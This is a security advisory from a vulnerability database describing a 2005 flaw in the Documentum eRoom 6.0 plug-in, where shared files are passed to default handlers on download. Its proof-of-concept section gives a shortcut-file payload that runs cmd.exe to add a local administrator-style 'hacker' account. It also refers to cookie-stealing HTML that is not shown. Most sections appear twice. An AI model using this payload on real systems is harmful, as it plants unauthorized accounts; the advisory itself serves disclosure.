eRoom Plug-In Insecure File Download Handling Vulnerability
BID:14176
Info
eRoom Plug-In Insecure File Download Handling Vulnerability
| Bugtraq ID: | 14176 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 06 2005 12:00AM |
| Updated: | Jul 06 2005 12:00AM |
| Credit: | Discovered by c0ntex - c0ntexb[at]gmail.com. |
| Vulnerable: |
Documentum eRoom 6.0 |
| Not Vulnerable: | |
Discussion
eRoom Plug-In Insecure File Download Handling Vulnerability
The eRoom plug-in is prone to an insecure file download handling vulnerability.
The issue is due to a design fault, where files that are shared by users are apparently passed to default file handlers when downloaded. This can occur without user knowledge, and can be a security risk for certain file types on certain platforms.
The eRoom plug-in is prone to an insecure file download handling vulnerability.
The issue is due to a design fault, where files that are shared by users are apparently passed to default file handlers when downloaded. This can occur without user knowledge, and can be a security risk for certain file types on certain platforms.
Exploit / POC
eRoom Plug-In Insecure File Download Handling Vulnerability
No exploit is required, the following examples are available:
Create and upload a shortcut file that contains the following:
%SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD
The following HTML code demonstrates an attack that will obtain, for the attacker, the cookie value of the target user session:
No exploit is required, the following examples are available:
Create and upload a shortcut file that contains the following:
%SystemRoot%\system32\cmd.exe /k net user hacker hackerpass /ADD
The following HTML code demonstrates an attack that will obtain, for the attacker, the cookie value of the target user session:
Solution / Fix
eRoom Plug-In Insecure File Download Handling Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
eRoom Plug-In Insecure File Download Handling Vulnerability
References:
References:
- eRoom Homepage (Documentum)
- eRoom Multiple Security Issues ([email protected])